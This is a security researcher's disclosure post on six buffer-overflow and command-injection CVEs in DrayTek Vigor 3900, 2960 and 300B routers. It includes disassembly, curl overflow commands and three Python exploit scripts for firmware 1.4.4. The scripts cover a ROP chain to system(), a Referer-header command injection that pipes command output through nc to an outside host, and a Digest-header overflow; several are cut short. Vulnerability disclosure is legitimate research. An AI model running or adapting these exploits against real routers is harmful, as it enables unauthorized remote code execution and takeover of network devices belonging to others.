Draytek Vulnerabilities

DrayTek Vigor 3900/2960/300B Vulnerabilities

I have found six vulnerabilities in DrayTek routers in the end of 2019 year. In this post I’ll describe all of them.

Which numbers were assigned

  • CVE-2020-10823 Stack-based buffer overflow in /cgi-bin/activate.cgi through var variable. The vulnerability allows to execute code by remote unauthorized attacker. Affected products: Vigor3900 before 1.5.1, Vigor2960 before 1.5.1, Vigor300B before 1.5.1
  • CVE-2020-10824 Stack-based buffer overflow in /cgi-bin/activate.cgi through ticket variable. The vulnerability allows to execute code by remote unauthorized attacker. Affected products: Vigor3900 before 1.5.1, Vigor2960 before 1.5.1, Vigor300B before 1.5.1
  • CVE-2020-10825 Stack-based buffer overflow in /cgi-bin/activate.cgi through base64-decoding ticket variable. The vulnerability allows to execute code by remote unauthorized attacker. Affected products: Vigor3900 before 1.5.1, Vigor2960 before 1.5.1, Vigor300B before 1.5.1
  • CVE-2020-10826 Command-injection in /cgi-bin/activate.cgi in DEBUG mode. The vulnerability allows to execute system command by remote unauthorized attacker if device works in DEBUG mode. Affected products: Vigor3900 before 1.5.1, Vigor2960 before 1.5.1, Vigor300B before 1.5.1
  • CVE-2020-10827 Stack-based buffer overflow in apmd service. The vulnerability allows to execute remote code by unauthorized attacker. Affected products: Vigor3900 before 1.5.1, Vigor2960 before 1.5.1, Vigor300B before 1.5.1
  • CVE-2020-10828 Stack-based buffer overflow in cvmd service. The vulnerability allows to execute remote code by unauthorized attacker. Affected products: Vigor3900 before 1.5.1, Vigor2960 before 1.5.1, Vigor300B before 1.5.1

Analyse vulnerabilities

CVE-2020-10823 and CVE-2020-10824

There are two vulnerabilities quite similar. /cgi-bin/activate.cgi accepts four parameters: action, var, ticket and mac (Figure 1).

Figure 1. Accepts ticket and var.

Both vulnerabilities are stack-base buffer overflows while copying user parameters var and ticket to static buffer (Figure 2).

Figure 2. memcpy ticket and var

Simple pseudo-code:

char static_buf_var[0x10];
char static_buf_ticket[0x200];
int param_var_len = strlen(param_var);
memcpy(static_buf_var, param_var, param_var_len);
int param_ticket_len = strlen(param_ticket);
memcpy(static_buf_ticket, param_ticket, param_ticket_len);


$ curl -d "var=`perl -e 'print "A" x 0x1000'`&ticket=1&mac=001122334455" -X POST
$ curl -d "ticket=`perl -e 'print "A" x 0x1000'`&var=1&mac=001122334455" -X POST


/cgi-bin/activate.cgi has unathorized stack buffer overflow while does base64_decode operation at ticket parameter. Vulnerable function is sub_F274 (base64_decode). sub_F274 takes 3 parameters:

  1. Input base64 string (ticket)
  2. Input base64 string length
  3. Pointer to the output buffer

Caller function sets 3rd paramter as static stack buffer with size 0x200 (Figure 3).

Figure 3. Calling vulnerabile function.

So if we give buffer more than 0x200 bytes while decoding base64 data it will corrupt the stack.

Exploit for Vigor3900 (1.4.4):

#!/usr/bin/env python3

__author__ = 'Valentin "slashd" Shilnenkov'

import os
import sys
import ssl
import base64
import socket

from struct import pack,unpack

def gen_postdata():
    buf = b'A' * 0x200
    buf += pack("<I", 0x41414141) # R4

    # pointer to the HTTP_REFERER 1.4.4
    buf += pack("<I", 0x0001D7E4) # R5

    buf += b'D' * 4 # R6
    buf += b'E' * 4 # R7
    buf += b'F' * 4 # R8

    # 1.4.4
    # .text:000093B0 05 00 A0 E1     MOV     R0, R5      ; command
    # .text:000093B4 A7 FE FF EB     BL      system
    buf += pack("<I", 0x000093B0) # LR

    # if action is set then Referer header
    # will be saved at static address in .bss
    payload = 'action=aaaaa&'

    payload += 'mac=000000000000&var=qwertasdfgzxcvby&ticket='
    payload = payload.encode() + base64.b64encode(buf)

    return payload

def create_connect_ssl(ip, port):
    conn = ssl.wrap_socket(socket.socket(socket.AF_INET))
    conn.connect((ip, port))
    return conn

def create_connect(ip, port):
    s = socket.create_connection((ip,port))
    return s

def make_http_req(cmd):
    postdata = gen_postdata()
    req = "POST /cgi-bin/activate.cgi HTTP/1.1\r\n"
    req += "Host:\r\n"
    req += "Referer: %s\r\n" % cmd
    req += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0\r\n"
    req += "Accept: */*\r\n"
    req += "Accept-Language: en-US,en;q=0.5\r\n"
    req += "Accept-Encoding: gzip, deflate\r\n"
    req += "Content-Type: application/x-www-form-urlencoded\r\n"
    req += "Content-Length: %d\r\n" % len(postdata)
    req += "Connection: close\r\n\r\n"
    req += postdata.decode()
    return req

def main(ip, addr):
    # to enable command injection:
    data = make_http_req('uci${IFS}set${IFS}fw_cf_license.fwlicense.debug=true')
    s = create_connect(ip, addr)

if __name__ == '__main__':
    main('', 8888)


/cgi-bin/activate.cgi has unathorized command injection in DEBUG mode. For activating DEBUG mode need to execute command:

$ uci set fw_cf_license.fwlicense.debug=true

After that activate.cgi will be logging debug data to log file through bash commands in some places. For example:

.text:00009E24 08 00 A0 E1     MOV     R0, buf_400h ; s
.text:00009E28 BC 1E 9F E5     LDR     R1, =0x3FF  ; maxlen
.text:00009E2C 98 2D 9F E5     LDR     R2, =aEchoActivateLi_0 ; "echo \"activate license debug 2  httpbu"...
.text:00009E30 7C 3D 9F E5     LDR     R3, =g_HTTP_REFERER
.text:00009E34 00 50 8D E5     STR     R5, [SP]
.text:00009E38 6F FC FF EB     BL      snprintf
.text:00009E3C 08 00 A0 E1     MOV     R0, buf_400h ; command
.text:00009E40 04 FC FF EB     BL      system

Exploit for Vigor3900 (1.4.4):

#!/usr/bin/env python3

__author__ 'Valentin "slashd" Shilnenkov'

import os
import sys
import ssl
import base64
import socket

from struct import pack,unpack

def gen_postdata():
    payload = 'action=geturl'
    return payload

def create_connect_ssl(ip, port):
    conn = ssl.wrap_socket(socket.socket(socket.AF_INET))
    conn.connect((ip, port))
    return conn

def create_connect(ip, port):
    s = socket.create_connection((ip,port))
    return s

def make_http_req(cmd):
    postdata = gen_postdata()
    req = "POST /cgi-bin/activate.cgi HTTP/1.1\r\n"
    req += "Host:\r\n"
    req += "Referer: `%s`\r\n" % cmd
    req += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0\r\n"
    req += "Accept: */*\r\n"
    req += "Accept-Language: en-US,en;q=0.5\r\n"
    req += "Accept-Encoding: gzip, deflate\r\n"
    req += "Content-Type: application/x-www-form-urlencoded\r\n"
    req += "Content-Length: %d\r\n" % len(postdata)
    req += "Connection: close\r\n\r\n"
    req += postdata
    return req

def exp():
    # execute command and send result back
    data = make_http_req('%s|nc${IFS}${IFS}1337' % sys.argv[1])

    s = create_connect('', 8888)

    res = s.recv(10240).decode()
    return res

def main():
    res = exp()
    # print(res)
    i = 0
    while 'Internal Server Error'  in res and i < 5:
        res = exp()
        i += 1

if __name__ == '__main__':

CVE-2020-10827 and CVE-2020-10828

apmd and cvmd have very similar vulnerability, because use same code-base. apmd and cvmd are simple web servers and have auth through Authorization Digest method. For triggering Authorization need to make query to the /ACSServer/services/ACSServlet. Stack-based buffer overflows occur while handles Authorization header in function at sub_11FB8 (cvmd at Vigor 3900 1.4.4). Function sub_11FB8 has 4 input parameters:

  1. Which key need extract from Authorization header (char *)
  2. Authorization header value.
  3. Output buffer.
  4. Outbut buffer length.

Also, sub_11FB8 has temp stack buffer size char[0x64] for value. If function has found value, the value copied to the temp stack buffer in 2 different pathes:

.text:00012070 07 40 65 E0     RSB             R4, R5, R7
.text:00012074 04 20 A0 E1     MOV             R2, R4 ; n
.text:00012078 05 10 A0 E1     MOV             R1, R5 ; src
.text:0001207C 08 00 A0 E1     MOV             R0, stack_buf ; dest
.text:00012080 E2 DF FF EB     BL              memcpy
.text:00012084 88 20 8D E2     ADD             R2, SP, #0x88+var_s0
.text:00012088 04 30 82 E0     ADD             R3, R2, R4
.text:0001208C 84 60 43 E5     STRB            R6, [R3,#-0x84]


.text:000121E8 04 40 65 E0     RSB             R4, R5, R4
.text:000121EC 04 20 A0 E1     MOV             R2, R4 ; n
.text:000121F0 05 10 A0 E1     MOV             R1, R5 ; src
.text:000121F4 08 00 A0 E1     MOV             R0, stack_buf ; dest
.text:000121F8 84 DF FF EB     BL              memcpy
.text:000121FC 88 20 8D E2     ADD             R2, SP, #0x88+var_s0
.text:00012200 04 30 82 E0     ADD             R3, R2, R4
.text:00012204 84 70 43 E5     STRB            R7, [R3,#-0x84]
.text:00012208 A0 FF FF EA     B               loc_12090

In R2 the strlen of the value. In R1 the value. In R0 the static stack-based buffer.

Exploit for Vigor3900 1.4.4:

#!/usr/bin/env python3

__author__ = 'Valentin "slashd" Shilnenkov'

import socket
# port=80

def make_payload():
    vulnbuf = 'touch /tmp/pwned|'
    vulnbuf += 'a' * (0x84 - len(vulnbuf))
    vulnbuf += 'bbbb' # R4
    vulnbuf += 'cccc' # R5
    vulnbuf += 'dddd' # R6
    vulnbuf += 'eeee' # R7
    vulnbuf += 'ffff' # R8
    vulnbuf += 'gggg' # R9
    vulnbuf += 'hhhh' # R10
    vulnbuf += '\xd0\xce' # PC
    # will be called the system function
    # at the R0 register our buffer
    payload = "GET /ACSServer/services/ACSServlet HTTP/1.1\r\n"
    payload += "Host:\r\n"
    payload += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n"
    payload += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    payload += "Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3\r\n"
    payload += "Accept-Encoding: gzip, deflate\r\n"
    payload += "Connection: close\r\n"
    payload += "Cookie: traffic_warning_0=2019.5:1\r\n"
    payload += 'Authorization: Digest username="admin", realm="CVM Server", nonce="MDAwMTRiN2I6RHJheXRlaw==", uri="/ACSServer/services/ACSServlet", algorithm=MD5, response=%s, qop=auth, nc=00000001, cnonce="7cb8eb1698646279"\r\n\r\n' % vulnbuf

    return payload

def pwn():
	p=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

if __name__ == '__main__':